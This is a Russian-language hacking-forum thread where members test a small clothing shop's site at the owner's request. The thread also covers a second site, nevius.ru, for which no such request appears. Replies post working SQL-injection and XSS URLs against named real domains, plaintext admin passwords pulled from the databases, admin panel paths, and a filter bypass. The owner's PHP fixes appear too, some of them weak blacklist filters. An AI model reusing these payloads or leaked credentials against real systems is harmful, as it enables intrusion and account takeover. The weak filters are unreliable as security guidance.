Форум АНТИЧАТ - Проверьте плиз сайтег

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - Проверьте плиз сайтег (https://forum.antichat.xyz/showthread.php?t=46543)

Проверьте плиз сайтег

Проверьте плз на уязвимости
www.casualwear.com.ua

ну ты даешь автор, такую херню продавать за такие бабки.. =\ (я о скриптах)

Код:

http://casualwear.com.ua/list.php?link=19+union+select+1,concat_ws(0x3a,pass,version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3+from+adminip/*

Код:

http://casualwear.com.ua/admin.php?admin

pass:vfhrtnbyu

Код:

http://nevius.ru/list.php?link=19+union+select+1,2,3,concat_ws(0x3a,pass,version()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+adminip/*

Код:

http://nevius.ru/admin.php

pass:nevada

c411k обогнал... я просто только заметил.. там кста тоже скуль и ксс

sql-inj, XSS..
http://casualwear.com.ua/list.php?c=Pringle+of+Scotland'+%22%3E%3Cscript%3E alert(/halkfild/)%3C/script%3E/*

http://casualwear.com.ua/list.php?c=Pringle+of+Scotland'+order+by+33/*

вообщем дальше не интересно.. так как есть пасс :( и вообще полное разоблачение.. :)

*добавлено

раскрытие путей
http://casualwear.com.ua/adminexe.php?export

Цитата:

var/www/casualwear/casualwear.com.ua/adminexe.php

Конечно с c411k не сравнить, но
Раскрытие пути :)

Цитата:

http://www.casualwear.com.ua/list.php?c=NOmeR1&r=&page[]

И XSS

Цитата:

http://www.casualwear.com.ua/list.php?srmin="><script>alert()</script>

Огромное спасибо, всем по +!

А скриптами я не торгую, просто стянул демку и переписал под себя магаз.

Если не трудно. скажите как от этого всего защититься. Заранее благодарю.

Цитата:

Сообщение от Marlboro_X

Я писал по жтому поводу скрипты. Ещё раз напишу
XSS

PHP код:


		
			
<?

...

$_GET['уязвимое_поле'] = htmlspecialchars($_GET['уязвимое_поле']);

...

?>

PHP-inj

PHP код:


		
			
<?  

error_reporting(0);  



...  



function inc($do,$inc,$posle)  

{ 



    $inc = htmlspecialchars($inc); 



    if(file($do.$inc.$posle)) 

    { 

        $inc = str_replace('http','',$inc); 

        $inc = str_replace('ftp','',$inc); 

        $inc = str_replace(':','',$inc); 

        $inc = str_replace('/','',$inc); 

        $inc = str_replace('\\','',$inc); 

        $inc = str_replace('.','',$inc); 



        include($do.$inc.$posle); 

    } 



    else echo 'Файла не существует'; 



} 



...  



if($_GET['page']) inc('',$_GET['page'],'.php'); 



...  



?>

SQL-inj:

PHP код:


		
			
<?

...

 function secure_sql($value) { 

        if( get_magic_quotes_gpc() ) { 

            $value = stripslashes( $value ); 

        } 

        if( function_exists( "mysql_real_escape_string" ) ) { 

            $value = mysql_real_escape_string( $value ); 

        } else { 

            $value = addslashes( $value ); 

        } 

        return $value; 

}

...

?>

Вроде фсе поправил. Попробуйте щас поковырять.

Сайт прежний www.casualwear.com.ua

xss
http://casualwear.com.ua/list.php?c=%22%3E%3Cscript%3Ealert()%3C/script%3E&r=&page=1&ord=ord&srmin=0&srmax=10000000 0&a=&p=1

Цитата:

Сообщение от Marlboro_X

Вроде фсе поправил. Попробуйте щас поковырять.

Сайт прежний www.casualwear.com.ua

Фильтруй все что приходит от пользователя, "ГЕТ, ПОСТ, КУККИСЫ, даже переменые SERVER" и все будет ОК

посылать на ... - это конечно очень эстетично, и наверно очень помогает обезопасить сайт, но все же фильтрации символа запятой не достаточно:

Код:

http://www.casualwear.com.ua/list.php?link=114+union+select+1%2C2%2C3%2Cpass%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33+from+adminip/*

pass:1234567890
админка там же все подходит =\